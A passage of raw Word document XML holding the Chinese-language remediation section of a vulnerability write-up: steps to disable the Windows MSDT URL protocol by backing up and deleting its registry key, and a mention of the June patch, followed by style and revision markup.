        <w:t>修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75041DE4" w14:textId="36F06247" w:rsidR="00A55F4A" w:rsidRDefault="00B07E8E" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00B07E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B07E8E">
        <w:t>MSDT URL协议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9CD524" w14:textId="2BC6ECC7" w:rsidR="006565CD" w:rsidRDefault="006565CD" w:rsidP="006565CD">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以管理员身份运行命令提示符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B992750" w14:textId="0976575A" w:rsidR="006565CD" w:rsidRDefault="006565CD" w:rsidP="006565CD">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>备份注册表项后，执行命令：</w:t>
      </w:r>
      <w:r>
        <w:t>reg export HKEY_CLASSES_ROOT\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-msdt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF72139" w14:textId="1C01CEFF" w:rsidR="006565CD" w:rsidRDefault="006565CD" w:rsidP="006565CD">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再执行命令：</w:t>
      </w:r>
      <w:r>
        <w:t>reg delete HKEY_CLASSES_ROOT\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-msdt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6EC210" w14:textId="1017A6D9" w:rsidR="006565CD" w:rsidRDefault="006565CD" w:rsidP="006565CD">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76688DCC" w14:textId="44FE81D7" w:rsidR="006565CD" w:rsidRPr="006565CD" w:rsidRDefault="0063167D" w:rsidP="0063167D">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="0063167D">
        <w:t>6月14日发布了windows对此漏洞的更新，对于windows8.1以下版本的系统，将通过KB5015805更新进行补丁，而windows10以上的系统则通过7月累积更新进行补丁</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006565CD" w:rsidRPr="0065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DEABD" w14:textId="77777777" w:rsidR="00E37BF7" w:rsidRDefault="00E37BF7" w:rsidP="00BD6588">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2D2D270F" w14:textId="77777777" w:rsidR="00E37BF7" w:rsidRDefault="00E37BF7" w:rsidP="00BD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626DE" w14:textId="77777777" w:rsidR="00E37BF7" w:rsidRDefault="00E37BF7" w:rsidP="00BD6588">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7BF16110" w14:textId="77777777" w:rsidR="00E37BF7" w:rsidRDefault="00E37BF7" w:rsidP="00BD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E"/>
    <w:rsid w:val="0000223A"/>
    <w:rsid w:val="00010FA0"/>
    <w:rsid w:val="00011D97"/>
    <w:rsid w:val="000173BE"/>
    <w:rsid w:val="00036937"/>
    <w:rsid w:val="00037E00"/>
    <w:rsid w:val="0004241A"/>
    <w:rsid w:val="00052933"/>
    <w:rsid w:val="00060927"/>
    <w:rsid w:val="000659A3"/>
    <w:rsid w:val="00072A23"/>
    <w:rsid w:val="00081232"/>
    <w:rsid w:val="000827E3"/>
    <w:rsid w:val="000847AB"/>
    <w:rsid w:val="00090691"/>
    <w:rsid w:val="000963D8"/>
    <w:rsid w:val="000D1FC1"/>
    <w:rsid w:val="000D2ACD"/>
    <w:rsid w:val="000D73F7"/>
    <w:rsid w:val="000E1491"/>
    <w:rsid w:val="000F1EEF"/>
    <w:rsid w:val="00101493"/>
    <w:rsid w:val="001071D1"/>
    <w:rsid w:val="001072BF"/>
    <w:rsid w:val="00111E3F"/>
    <w:rsid w:val="0011212C"/>
    <w:rsid w:val="001150CE"/>
    <w:rsid w:val="001246DD"/>
    <w:rsid w:val="00130C00"/>
    <w:rsid w:val="00135D26"/>
    <w:rsid w:val="001427CA"/>
    <w:rsid w:val="001442B0"/>
    <w:rsid w:val="001443DC"/>
    <w:rsid w:val="001537D4"/>
    <w:rsid w:val="00157557"/>
    <w:rsid w:val="00167420"/>
    <w:rsid w:val="00171101"/>
    <w:rsid w:val="001830A3"/>
    <w:rsid w:val="00196E1E"/>
    <w:rsid w:val="001B5472"/>
    <w:rsid w:val="001C1F5F"/>
    <w:rsid w:val="001E5F58"/>
    <w:rsid w:val="001F58FA"/>
    <w:rsid w:val="00210DC4"/>
    <w:rsid w:val="002174FE"/>
    <w:rsid w:val="002214EE"/>
    <w:rsid w:val="0022354D"/>
    <w:rsid w:val="0022613E"/>
    <w:rsid w:val="002261C3"/>
    <w:rsid w:val="0022753C"/>
    <w:rsid w:val="00233F96"/>
    <w:rsid w:val="00237169"/>
    <w:rsid w:val="002401CD"/>
    <w:rsid w:val="00241755"/>
    <w:rsid w:val="002435F9"/>
    <w:rsid w:val="002462AB"/>
    <w:rsid w:val="00266C47"/>
    <w:rsid w:val="002711C0"/>
    <w:rsid w:val="00273996"/>
    <w:rsid w:val="00280B8C"/>
    <w:rsid w:val="0028672A"/>
    <w:rsid w:val="002916E5"/>
    <w:rsid w:val="002930C0"/>
    <w:rsid w:val="00297241"/>
    <w:rsid w:val="002B3A73"/>
    <w:rsid w:val="002B4194"/>
    <w:rsid w:val="002B57F1"/>
    <w:rsid w:val="002B63F5"/>
    <w:rsid w:val="002C53C8"/>
    <w:rsid w:val="002D6638"/>
    <w:rsid w:val="002E0FF3"/>
    <w:rsid w:val="00303C7C"/>
    <w:rsid w:val="00313A40"/>
    <w:rsid w:val="00326E5E"/>
    <w:rsid w:val="0034378F"/>
    <w:rsid w:val="00350B5F"/>
    <w:rsid w:val="003511E4"/>
    <w:rsid w:val="00372499"/>
    <w:rsid w:val="0037269B"/>
    <w:rsid w:val="003807EF"/>
    <w:rsid w:val="00382B3E"/>
    <w:rsid w:val="003942B6"/>
    <w:rsid w:val="00394F1A"/>
    <w:rsid w:val="003A5138"/>
    <w:rsid w:val="003A516F"/>
    <w:rsid w:val="003A7159"/>
    <w:rsid w:val="003C675A"/>
    <w:rsid w:val="003C69A2"/>
    <w:rsid w:val="003C6A27"/>
    <w:rsid w:val="003D57C1"/>
    <w:rsid w:val="003E1228"/>
    <w:rsid w:val="003F0EBB"/>
    <w:rsid w:val="00405FB0"/>
    <w:rsid w:val="00407610"/>
    <w:rsid w:val="00414D35"/>
    <w:rsid w:val="00414D89"/>
    <w:rsid w:val="004303E7"/>
    <w:rsid w:val="00432BD9"/>
    <w:rsid w:val="00434804"/>
    <w:rsid w:val="00435525"/>
    <w:rsid w:val="00440FBB"/>
    <w:rsid w:val="00441C22"/>
    <w:rsid w:val="004451CE"/>
    <w:rsid w:val="0044635C"/>
    <w:rsid w:val="00456618"/>
    <w:rsid w:val="00460D97"/>
    <w:rsid w:val="00461705"/>
    <w:rsid w:val="00473133"/>
    <w:rsid w:val="00474E0A"/>
    <w:rsid w:val="00482B45"/>
    <w:rsid w:val="00483FEC"/>
    <w:rsid w:val="0049214F"/>
    <w:rsid w:val="00497C71"/>
    <w:rsid w:val="004B4331"/>
    <w:rsid w:val="004C4499"/>
    <w:rsid w:val="004E5C1E"/>
    <w:rsid w:val="004F1F09"/>
    <w:rsid w:val="0050214B"/>
    <w:rsid w:val="00502753"/>
    <w:rsid w:val="00503DDA"/>
    <w:rsid w:val="00514360"/>
    <w:rsid w:val="00514B5A"/>
    <w:rsid w:val="00531A25"/>
    <w:rsid w:val="00537F18"/>
    <w:rsid w:val="00544630"/>
    <w:rsid w:val="00547E37"/>
    <w:rsid w:val="005505E0"/>
    <w:rsid w:val="00555759"/>
    <w:rsid w:val="0055774E"/>
    <w:rsid w:val="00563283"/>
    <w:rsid w:val="005773FA"/>
    <w:rsid w:val="005905C2"/>
    <w:rsid w:val="005A0AD1"/>
    <w:rsid w:val="005A5529"/>
    <w:rsid w:val="005B045E"/>
    <w:rsid w:val="005B447F"/>
    <w:rsid w:val="005B729A"/>
    <w:rsid w:val="005C25A8"/>
    <w:rsid w:val="005C3908"/>
    <w:rsid w:val="005C6A79"/>
    <w:rsid w:val="005F1D1E"/>
    <w:rsid w:val="005F3225"/>
    <w:rsid w:val="005F3B89"/>
    <w:rsid w:val="00601F47"/>
    <w:rsid w:val="00605EB8"/>
    <w:rsid w:val="006142A2"/>
    <w:rsid w:val="0062052C"/>
    <w:rsid w:val="0063167D"/>
    <w:rsid w:val="00632B08"/>
    <w:rsid w:val="00654B8C"/>
    <w:rsid w:val="006565CD"/>
    <w:rsid w:val="00656942"/>
    <w:rsid w:val="006640B4"/>
    <w:rsid w:val="00666446"/>
    <w:rsid w:val="00670A6D"/>
    <w:rsid w:val="006802F1"/>
    <w:rsid w:val="00680B96"/>
    <w:rsid w:val="00690054"/>
    <w:rsid w:val="0069712C"/>
    <w:rsid w:val="006A79D6"/>
    <w:rsid w:val="006C2943"/>
    <w:rsid w:val="006D79E3"/>
    <w:rsid w:val="00700F01"/>
    <w:rsid w:val="007026D7"/>
    <w:rsid w:val="0070727C"/>
    <w:rsid w:val="007076C3"/>
    <w:rsid w:val="00713A03"/>
    <w:rsid w:val="00721FB5"/>
    <w:rsid w:val="007318CA"/>
    <w:rsid w:val="00740C0B"/>
    <w:rsid w:val="007416DB"/>
    <w:rsid w:val="0074312A"/>
    <w:rsid w:val="00747FDC"/>
    <w:rsid w:val="00750356"/>
    <w:rsid w:val="00752F90"/>
    <w:rsid w:val="00754928"/>
    <w:rsid w:val="00760BE0"/>
    <w:rsid w:val="00761523"/>
    <w:rsid w:val="00770FE2"/>
    <w:rsid w:val="00777984"/>
    <w:rsid w:val="00787A97"/>
    <w:rsid w:val="007A170A"/>
    <w:rsid w:val="007A6052"/>
    <w:rsid w:val="007B2D7D"/>
    <w:rsid w:val="007C44BC"/>
    <w:rsid w:val="007C769F"/>
    <w:rsid w:val="007D172E"/>
    <w:rsid w:val="007D402B"/>
    <w:rsid w:val="007D4193"/>
    <w:rsid w:val="007D4202"/>
    <w:rsid w:val="007D48E0"/>
    <w:rsid w:val="007E72EB"/>
    <w:rsid w:val="007E780A"/>
    <w:rsid w:val="007F6E8A"/>
    <w:rsid w:val="00801718"/>
    <w:rsid w:val="0080658E"/>
    <w:rsid w:val="008140FE"/>
    <w:rsid w:val="00815855"/>
    <w:rsid w:val="00817FF5"/>
    <w:rsid w:val="008200A6"/>
    <w:rsid w:val="008271D3"/>
    <w:rsid w:val="00827585"/>
    <w:rsid w:val="00827D86"/>
    <w:rsid w:val="008305A2"/>
    <w:rsid w:val="008400A2"/>
    <w:rsid w:val="00854CD3"/>
    <w:rsid w:val="008575F5"/>
    <w:rsid w:val="008809EC"/>
    <w:rsid w:val="00885E0D"/>
    <w:rsid w:val="0088648A"/>
    <w:rsid w:val="008922C0"/>
    <w:rsid w:val="008A25A7"/>
    <w:rsid w:val="008C042D"/>
    <w:rsid w:val="008C0CFE"/>
    <w:rsid w:val="008C421E"/>
    <w:rsid w:val="008C431F"/>
    <w:rsid w:val="008D52F5"/>
    <w:rsid w:val="008E0049"/>
    <w:rsid w:val="008E0839"/>
    <w:rsid w:val="008F79CC"/>
    <w:rsid w:val="00902F1C"/>
    <w:rsid w:val="00912C5A"/>
    <w:rsid w:val="00922CAC"/>
    <w:rsid w:val="00935444"/>
    <w:rsid w:val="00940986"/>
    <w:rsid w:val="00947A5E"/>
    <w:rsid w:val="00947D9E"/>
    <w:rsid w:val="0096118E"/>
    <w:rsid w:val="00982B50"/>
    <w:rsid w:val="009842BE"/>
    <w:rsid w:val="00991B02"/>
    <w:rsid w:val="00992E1E"/>
    <w:rsid w:val="009C0B24"/>
    <w:rsid w:val="009C3972"/>
    <w:rsid w:val="009D0413"/>
    <w:rsid w:val="009D108F"/>
    <w:rsid w:val="009E018A"/>
    <w:rsid w:val="009E3438"/>
    <w:rsid w:val="009E6B56"/>
    <w:rsid w:val="009F10F3"/>
    <w:rsid w:val="00A14C4A"/>
    <w:rsid w:val="00A201BE"/>
    <w:rsid w:val="00A22BB7"/>
    <w:rsid w:val="00A2473A"/>
    <w:rsid w:val="00A24888"/>
    <w:rsid w:val="00A41C77"/>
    <w:rsid w:val="00A509C4"/>
    <w:rsid w:val="00A536F9"/>
    <w:rsid w:val="00A55F4A"/>
    <w:rsid w:val="00AB27E6"/>
    <w:rsid w:val="00AD0B98"/>
    <w:rsid w:val="00AD4409"/>
    <w:rsid w:val="00AE0FDF"/>
    <w:rsid w:val="00AE1B65"/>
    <w:rsid w:val="00AE59F6"/>
    <w:rsid w:val="00B07E8E"/>
    <w:rsid w:val="00B14795"/>
    <w:rsid w:val="00B15968"/>
    <w:rsid w:val="00B32535"/>
    <w:rsid w:val="00B3399C"/>
    <w:rsid w:val="00B356A7"/>
    <w:rsid w:val="00B37FCE"/>
    <w:rsid w:val="00B44B30"/>
    <w:rsid w:val="00B4672E"/>
    <w:rsid w:val="00B6141A"/>
    <w:rsid w:val="00B76183"/>
    <w:rsid w:val="00B772D9"/>
    <w:rsid w:val="00B957CC"/>
    <w:rsid w:val="00BA15E3"/>
    <w:rsid w:val="00BA1E58"/>
    <w:rsid w:val="00BB12C2"/>
    <w:rsid w:val="00BC39B2"/>
    <w:rsid w:val="00BC4307"/>
    <w:rsid w:val="00BC5F8A"/>
    <w:rsid w:val="00BC605A"/>
    <w:rsid w:val="00BD1B15"/>
    <w:rsid w:val="00BD6207"/>
    <w:rsid w:val="00BD6588"/>
    <w:rsid w:val="00BE02CB"/>
    <w:rsid w:val="00BE17EB"/>
    <w:rsid w:val="00BE2DA9"/>
    <w:rsid w:val="00BE69FE"/>
    <w:rsid w:val="00BF231A"/>
    <w:rsid w:val="00BF31BB"/>
    <w:rsid w:val="00C2510A"/>
    <w:rsid w:val="00C341C0"/>
    <w:rsid w:val="00C357DC"/>
    <w:rsid w:val="00C44AC1"/>
    <w:rsid w:val="00C50A46"/>
    <w:rsid w:val="00C77D7F"/>
    <w:rsid w:val="00C85153"/>
    <w:rsid w:val="00CA098D"/>
    <w:rsid w:val="00CA0A1C"/>
    <w:rsid w:val="00CA4313"/>
    <w:rsid w:val="00CA7DBA"/>
    <w:rsid w:val="00CB797C"/>
    <w:rsid w:val="00CC2552"/>
    <w:rsid w:val="00CD7A51"/>
    <w:rsid w:val="00CE260D"/>
    <w:rsid w:val="00CE72A6"/>
    <w:rsid w:val="00D039B4"/>
    <w:rsid w:val="00D049CB"/>
    <w:rsid w:val="00D068B0"/>
    <w:rsid w:val="00D25DF5"/>
    <w:rsid w:val="00D315F2"/>
    <w:rsid w:val="00D37EE7"/>
    <w:rsid w:val="00D454BE"/>
    <w:rsid w:val="00D552B1"/>
    <w:rsid w:val="00D60D85"/>
    <w:rsid w:val="00D950DB"/>
    <w:rsid w:val="00DD2149"/>
    <w:rsid w:val="00DE070A"/>
    <w:rsid w:val="00DF1E0C"/>
    <w:rsid w:val="00E10570"/>
    <w:rsid w:val="00E12282"/>
    <w:rsid w:val="00E163E5"/>
    <w:rsid w:val="00E349EF"/>
    <w:rsid w:val="00E37BF7"/>
    <w:rsid w:val="00E413CC"/>
    <w:rsid w:val="00E47238"/>
    <w:rsid w:val="00E56DE5"/>
    <w:rsid w:val="00E80299"/>
    <w:rsid w:val="00E8378B"/>
    <w:rsid w:val="00E92323"/>
    <w:rsid w:val="00EA2542"/>
    <w:rsid w:val="00EA3C58"/>
    <w:rsid w:val="00EC3329"/>
    <w:rsid w:val="00EC43BA"/>
    <w:rsid w:val="00EE04BA"/>
    <w:rsid w:val="00EE2772"/>
    <w:rsid w:val="00EF03E4"/>
    <w:rsid w:val="00EF135A"/>
    <w:rsid w:val="00EF50FF"/>
    <w:rsid w:val="00EF5F52"/>
    <w:rsid w:val="00F17666"/>
    <w:rsid w:val="00F37F72"/>
    <w:rsid w:val="00F5235E"/>
    <w:rsid w:val="00F5239A"/>
    <w:rsid w:val="00F53B12"/>
    <w:rsid w:val="00F5640F"/>
    <w:rsid w:val="00F71A2A"/>
    <w:rsid w:val="00F74650"/>
    <w:rsid w:val="00F80806"/>
    <w:rsid w:val="00F80CD9"/>
    <w:rsid w:val="00F818D7"/>
    <w:rsid w:val="00F87731"/>
    <w:rsid w:val="00F90C13"/>
    <w:rsid w:val="00FA1EF0"/>
    <w:rsid w:val="00FA6E7D"/>
    <w:rsid w:val="00FC7002"/>
    <w:rsid w:val="00FE1CD1"/>
    <w:rsid w:val="00FE20EA"/>
    <w:rsid w:val="00FE2C91"/>
    <w:rsid w:val="00FE5A96"/>
    <w:rsid w:val="00FF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AE33"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C37D6230-1B0A-4227-A501-03B1A93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650"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="006A79D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950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E72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10FA0"/>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010FA0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="21">
    <w:name w:val="正文2"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="22"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00544630"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="22">
    <w:name w:val="正文2 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="21"/>
    <w:rsid w:val="00544630"/>
    <w:rPr>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00010FA0"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="a5">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="0001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950DB"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D950D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511E4"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="007E72EB"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="006A79D6"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004B4331"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a9">
    <w:name w:val="批注框文本 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="004B4331"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="11">
    <w:name w:val="网格型1"/>
    <w:basedOn w:val="a1"/>
    <w:next w:val="a5"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00BD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D658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6588"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ac">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="ad"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BD6588"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ad">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00BD6588"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ae">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D039B4"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00721FB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01">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="370610714">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="64692860">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="483857122">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="108093180">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="39401950">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="133450038">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1152216168">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="160196094">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="187566374">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="414860123">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="209457456">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
